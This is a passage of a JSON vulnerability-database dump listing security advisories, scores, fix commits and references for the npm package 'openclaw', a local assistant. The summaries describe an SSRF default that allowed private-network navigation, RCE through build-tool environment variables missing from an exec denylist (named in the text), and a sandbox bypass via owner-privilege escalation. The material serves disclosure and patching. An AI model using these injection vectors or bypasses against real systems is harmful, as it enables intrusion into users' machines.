ID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35624","GHSA-xhq5-45pm-2gjr"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3xeb-phgc-vkcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89051?format=json","vulnerability_id":"VCID-3xmj-n798-x3cw","summary":"OpenClaw: Browser SSRF policy default allowed private-network navigation\n## Summary\n\nBrowser SSRF policy default allowed private-network navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nBrowser SSRF protection could allow private-network navigation by default in paths where restrictive behavior was expected, exposing internal services or metadata endpoints through browser-driven requests.\n\n## Technical Details\n\nThe fix preserves strict SSRF configuration semantics, keeps private-network access disabled unless explicitly opted in, and updates loopback CDP readiness handling for the stricter default.\n\n## Fix\n\nThe issue was fixed in #66354 and #66386. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `024f4614a1a1831406e763adc40ef226e3d5e9ed`\n- `1dabfef28db523e7de81edeb3dd689e9171236a2`\n- `213c36cf51121ef6c05cfccd78037371f968f31a`\n- `7eecfa411df3d12e6b810e6ca5df47254fc3db3f`\n- PR: #66354, #66386\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43527","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10565","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.1227","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.12235","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43527"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2"},{"reference_url":"https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66354","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66354"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66386","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66386"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43527","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43527"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation"},{"reference_url":"https://github.com/advisories/GHSA-53vx-pmqw-863c","reference_id":"GHSA-53vx-pmqw-863c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-53vx-pmqw-863c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-43527","GHSA-53vx-pmqw-863c"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3xmj-n798-x3cw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89496?format=json","vulnerability_id":"VCID-3zwq-dz2u-pqgv","summary":"OpenClaw: HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class)\n## Impact\n\nHGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class).\n\nMissing denylist entries allowed hostile build-tool environment variables to influence host exec commands.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42427","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11001","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10959","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10993","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42427"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42427","reference_id":"CVE-2026-42427","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42427"},{"reference_url":"https://github.com/advisories/GHSA-7437-7hg8-frrw","reference_id":"GHSA-7437-7hg8-frrw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7437-7hg8-frrw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42427","GHSA-7437-7hg8-frrw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3zwq-dz2u-pqgv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90172?format=json","vulnerability_id":"VCID-3zx4-t8cj-kbfn","summary":"OpenClaw: Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n## Summary\nHeartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: Critical\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a30214a624946fc5c85c9558a27c1580172374fd` — 2026-03-31T09:06:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41329","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41329"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"